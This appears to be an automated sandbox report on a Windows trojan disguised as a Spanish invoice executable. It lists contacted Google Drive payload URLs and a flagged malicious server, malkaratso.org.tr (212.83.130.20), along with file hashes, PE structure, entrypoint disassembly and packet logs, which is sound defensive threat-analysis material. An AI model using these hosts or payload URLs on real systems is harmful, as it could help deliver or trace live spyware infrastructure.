                              https://doc-0s-7o-docs.googleusercontent.com/CasPol.exe, 00000004.00000003.10188398344.00000000017B0000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14843837643.0000000001765000.00000004.00000020.sdmpfalse
                                		high
                                http://UEjXzO.comCasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://malkaratso.org.trCasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://doc-0s-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0bbf1109CasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.10188398344.00000000017B0000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14844252807.000000000179D000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.10184300032.00000000017B0000.00000004.00000001.sdmpfalse
                                  		high
                                  https://nIf2mZFBKJ.orgD/oCasPol.exe, 00000004.00000002.14855520820.000000001E544000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://nIf2mZFBKJ.orgt-CasPol.exe, 00000004.00000002.14855520820.000000001E544000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.185.206
                                  		drive.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  142.250.186.161
                                  		googlehosted.l.googleusercontent.comUnited States
                                  		15169GOOGLEUSfalse
                                  212.83.130.20
                                  		malkaratso.org.trFrance
                                  		12876OnlineSASFRtrue

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:530287
                                  Start date:29.11.2021
                                  Start time:11:27:19
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 12m 38s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:184285013-044310-Factura pendiente (2).exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                  Run name:Suspected Instruction Hammering
                                  Number of analysed new started processes analysed:16
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@5/2@3/3
                                  EGA Information:Failed
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 94%
                                  • Number of executed functions: 113
                                  • Number of non-executed functions: 21
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.54.122.82
                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, spclient.wg.spotify.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  11:30:01API Interceptor2675x Sleep call for process: CasPol.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  212.83.130.20184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                    184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                      Iz0esE9os7.exeGet hashmaliciousBrowse
                                        184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                          184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                            184285013-044310-sanlccjavap0003-7069_pdf (5).exeGet hashmaliciousBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              OnlineSASFRMTjXit7IJnGet hashmaliciousBrowse
                                              • 51.158.219.54
                                              SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                              • 195.154.133.20
                                              gvtdsqavfej.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              mhOX6jll6x.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              dguQYT8p8j.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              jSxIzXfwc7.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              mhOX6jll6x.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              X2XCewI2Yy.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              dguQYT8p8j.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              HMvjzUYq2h.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              s9BZBDWmi4.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              bFx5bZRC6P.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              c7IUEh66u6.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              HMvjzUYq2h.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              s9BZBDWmi4.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              bFx5bZRC6P.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              WfCt2B042X.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              ZKVYER7XcT.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              2cq85E4EeM.dllGet hashmaliciousBrowse
                                              • 195.154.146.35
                                              WfCt2B042X.dllGet hashmaliciousBrowse
                                              • 195.154.146.35

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37f463bf4616ecd445d4a1937da06e19web-1142655642.xlsGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              FACTURAS.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              web-115940.xlsGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              jH9lY2utAE.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              SecuriteInfo.com.W32.AIDetect.malware1.18149.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              LqESfLRNgh.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              phrkOEUqtU.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              U2fkDYwhFW.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              research-1186335980.xlsGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              N6y7A7R9wg.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              DClTdEZJKD.dllGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              UD8mooZBwd.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              NOTA_FISCAL_2617879.msiGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              Dokumentsides.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              3vOROnp9LC.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              bK3nwTlUvf.dllGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              B3U0EAWfHN.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              B3U0EAWfHN.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206
                                              3A227B8E84722B577247B94618314F2FF02A48A2F984C.exeGet hashmaliciousBrowse
                                              • 142.250.186.161
                                              • 142.250.185.206

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\~DF62B766E3E76984FB.TMP
                                              Process:C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):1.9866006611106688
                                              Encrypted:false
                                              SSDEEP:96:jWpahLKAycVxc4LlvnffSIPW0wLzzj1ylDHn3Rs:KMhLKCxV5vnffI0wIdHBs
                                              MD5:A256BBA112F7FA34FE9E19ED07D0DF83
                                              SHA1:3E86ADD7C0890C55E8F22334A3E26134D7AB1EE8
                                              SHA-256:AB9F6744C55428A62F4696BC1779409A30420D0983EDD5536A0D280DF5EE7FE0
                                              SHA-512:9E762DFE82611778602E8BF19439E48AF7278D3D9399FF44666EB8A196206F4B1B50B9B623710B138BD7A7E9C1E0A05BE85CE6FB7B0F208C9664669297C416EA
                                              Malicious:false
                                              Reputation:low
                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              \Device\ConDrv
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):30
                                              Entropy (8bit):3.964735178725505
                                              Encrypted:false
                                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                              MD5:9F754B47B351EF0FC32527B541420595
                                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: NordVPN directory not found!..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):5.056396633960696
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:184285013-044310-Factura pendiente (2).exe
                                              File size:155648
                                              MD5:d69e979d7a91cdfa8915049a4e6454a5
                                              SHA1:2c7904a4a0640f529231e1098757465f376a4735
                                              SHA256:a4268d9fec123879950639a366105a0861d3168433164f6d5c1b80f65a16f490
                                              SHA512:6dd41e0cf1440a09c1fd69fea560101ed39f8924b8222f256cf322d6e2c14a7540228e8be1bcbbb7cff32f9c4dd52cb2d41147bc03621b736f07e4081db3f0a8
                                              SSDEEP:3072:sfJff2iKVmUXi6uzVXwpbxBTPfJffpfJff:ziK4UXPwVXEn
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....;.N.....................P............... ....@................

                                              File Icon

                                              Icon Hash:70ecccaececc71e2

                                              Static PE Info

                                              General

                                              Entrypoint:0x4015a8
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x4E833B8B [Wed Sep 28 15:21:47 2011 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:458ac857eb15a6ebaad7748f2f663dae

                                              Entrypoint Preview

                                              Instruction
                                              push 00402DCCh
                                              call 00007F3980BEDBD5h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              xor byte ptr [eax], al
                                              add byte ptr [eax], al
                                              inc eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add ch, bl
                                              retf
                                              adc al, byte ptr [ebp+470E2AC0h]
                                              mov byte ptr [C88C7AFBh], al
                                              sal dword ptr [edx-1Fh], 1
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add dword ptr [eax], eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              inc edx
                                              jc 00007F3980BEDC47h
                                              jbe 00007F3980BEDC58h
                                              imul esi, dword ptr [ebx+6Ch], 65h
                                              outsb
                                              add byte ptr fs:[eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add bh, bh
                                              int3
                                              xor dword ptr [eax], eax
                                              add eax, 9C8D9BAFh
                                              jmp 00007F391D002F07h
                                              je 00007F3980BEDB89h
                                              and ebx, dword ptr [edx]
                                              inc edi
                                              or eax, ecx
                                              and dword ptr [ecx-701AD827h], ebx
                                              ror dword ptr [ebx+esi*4-36h], 1
                                              movsb
                                              pop edx
                                              sub esp, dword ptr [edx+4F3AA7E5h]
                                              lodsd
                                              xor ebx, dword ptr [ecx-48EE309Ah]
                                              or al, 00h
                                              stosb
                                              add byte ptr [eax-2Dh], ah
                                              xchg eax, ebx
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              jc 00007F3980BEDBF8h
                                              add byte ptr [eax], al
                                              lea edx, dword ptr [06000000h]
                                              add byte ptr [esi+75h], cl
                                              imul esi, dword ptr fs:[ecx+edi*2+00h], 000C010Dh
                                              push ebp
                                              push esi
                                              dec ecx
                                              dec esp
                                              dec esp
                                              dec ecx
                                              inc edi
                                              dec eax

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x213b40x28.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x2f2c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x194.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x209880x21000False0.356548887311data5.22027370085IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .data0x220000x12500x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x240000x2f2c0x3000False0.232340494792data4.20294009628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              CUSTOM0x259920x1542dataEnglishUnited States
                                              RT_ICON0x248ea0x10a8data
                                              RT_ICON0x244820x468GLS_BINARY_LSB_FIRST
                                              RT_STRING0x26ed40x58dataEnglishUnited States
                                              RT_GROUP_ICON0x244600x22data
                                              RT_VERSION0x241c00x2a0dataEnglishUnited States

                                              Imports

                                              DLLImport
                                              MSVBVM60.DLL__vbaVarTstGt, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaPrintObj, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                              Version Infos

                                              DescriptionData
                                              Translation0x0409 0x04b0
                                              LegalCopyrightCorps
                                              InternalNameBanemand
                                              FileVersion1.00
                                              CompanyNameCorps
                                              LegalTrademarksCorps
                                              ProductNameCorps
                                              ProductVersion1.00
                                              FileDescriptionCorps
                                              OriginalFilenameBanemand.exe

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2021 11:29:50.870119095 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:50.870202065 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:50.870376110 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:50.887514114 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:50.887571096 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:50.943502903 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:50.943751097 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:50.945564985 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:50.945893049 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:51.051686049 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:51.051743984 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:51.052459002 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:51.052625895 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:51.055799007 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:51.099900007 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:51.411571980 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:51.411900997 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:51.411972046 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:51.412180901 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:51.412214994 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:51.412369013 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:51.418037891 CET49798443192.168.11.20142.250.185.206
                                              Nov 29, 2021 11:29:51.418143988 CET44349798142.250.185.206192.168.11.20
                                              Nov 29, 2021 11:29:51.514401913 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.514417887 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.514671087 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.514988899 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.514998913 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.549303055 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.549515963 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.549966097 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.550148964 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.550156116 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.553618908 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.553750038 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.553981066 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.554311991 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.595879078 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.775510073 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.775783062 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.775959969 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.776254892 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.776839972 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.777070045 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.778465033 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.778682947 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.778729916 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.778939009 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.780359983 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.780677080 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.780723095 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.780949116 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.786446095 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.786638975 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.786722898 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.786775112 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.786809921 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.786921978 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.786957026 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.787606001 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.787890911 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.787935972 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.788129091 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.788353920 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.788552999 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.788599014 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.788788080 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.789108992 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.789343119 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.789390087 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.789616108 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.789823055 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.789988041 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.790015936 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.790254116 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.790467978 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.790635109 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.790661097 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.790901899 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.791233063 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.791980028 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.792049885 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.792078972 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.792232990 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.792268991 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.792294025 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.792561054 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.792818069 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.793147087 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.793194056 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.793354988 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.793529987 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.793783903 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.793831110 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.793986082 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.794161081 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.794409990 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.794456005 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.794645071 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.794876099 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.795084953 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.795130968 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.795357943 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.796523094 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.796674967 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.796704054 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.796822071 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.796986103 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.797039032 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.797049046 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.797307014 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.797722101 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.797772884 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.797983885 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.798070908 CET44349799142.250.186.161192.168.11.20
                                              Nov 29, 2021 11:29:51.798320055 CET49799443192.168.11.20142.250.186.161
                                              Nov 29, 2021 11:29:51.798367977 CET44349799142.250.186.161192.168.11.20
